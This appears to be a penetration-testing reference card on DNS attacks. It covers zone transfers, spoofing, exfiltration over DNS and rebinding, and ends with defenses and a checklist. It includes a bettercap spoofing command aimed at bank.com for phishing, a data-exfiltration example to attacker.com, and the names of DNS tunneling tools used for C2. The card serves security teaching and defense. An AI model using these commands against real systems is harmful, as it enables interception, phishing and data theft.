Skip to content

DNS Attacks

DNS is the Internet’s phone book, and since all traffic starts by resolving a name, manipulating it has huge impact: you can redirect victims to fake servers, intercept traffic, exfiltrate data over a covert channel, or enumerate an organization’s whole infrastructure. This card covers attacks on DNS, from recon to active manipulation (the protocol fundamentals are in DNS Fundamentals).

  • Zone transfer (AXFR): if misconfigured, hands you the whole zone.
  • DNS spoofing/cache poisoning: answer with fake IPs to redirect victims.
  • DNS exfiltration/tunneling: extract data encoded in DNS queries (covert channel).
  • Subdomain takeover: claim a subdomain with a dangling CNAME (see Subdomain takeover).
  • DNS rebinding: bypass the Same-Origin Policy toward internal services.
  • Insecure dynamic DNS: update records without authentication.
# find the NS and request the full zone
dig NS target.com
dig axfr @ns1.target.com target.com
# if it works: all records (subdomains, internal IPs, mail, etc.)

An open AXFR is a classic finding: it hands over the domain’s full map.

Answer DNS queries faster than the legitimate server (in a MITM) or poison a resolver’s cache:

# in a MITM (see net-mitm): answer the victim's query with your IP
bettercap -> set dns.spoof.domains bank.com ; dns.spoof on
# the victim resolves bank.com -> your server (phishing/capture)

Classically also via flaws in resolver randomness (Kaminsky, 2008) — today mitigated with source port randomization and DNSSEC.

DNS is usually allowed outbound even on restricted networks, so it serves as a covert channel:

# encode data in subdomains -> the attacker's authoritative server receives them
data.encoded.in.base32.attacker.com
# tools
iodine / dnscat2 / dns2tcp -> full tunnel (C2, exfiltration) over DNS

Useful to exfiltrate data or maintain C2 when other ports are blocked.

An attacker domain first resolves to their IP (to load the JS) and then to an internal IP of the victim, bypassing the Same-Origin Policy to attack internal services (routers, local APIs) from the victim’s browser.

  • Restrict zone transfers to authorized secondaries (ACL on the DNS).
  • DNSSEC (record signing) against spoofing/poisoning; source port randomization.
  • Monitor anomalous DNS queries: high volume to one domain, long/random subdomains (tunneling), unusual TXT.
  • Filter/inspect outbound DNS (DNS firewall, block external resolvers, Protective DNS).
  • Against rebinding: validate Host/Origin on internal services, block DNS answers pointing to private IPs from external resolvers.
  • Clean up stale records (prevents subdomain takeover — see Subdomain takeover).
  • Zone transfer (AXFR) on the domain’s NS
  • DNS spoofing in a MITM (redirect to a controlled host)
  • DNS tunneling feasibility (is outbound DNS allowed?)
  • Subdomain takeover (dangling CNAMEs — Subdomain takeover)
  • DNS rebinding toward internal services
  • Is DNSSEC present? Resolver randomness?
  • Stale records that enable takeover
  • Blue: monitoring of anomalous queries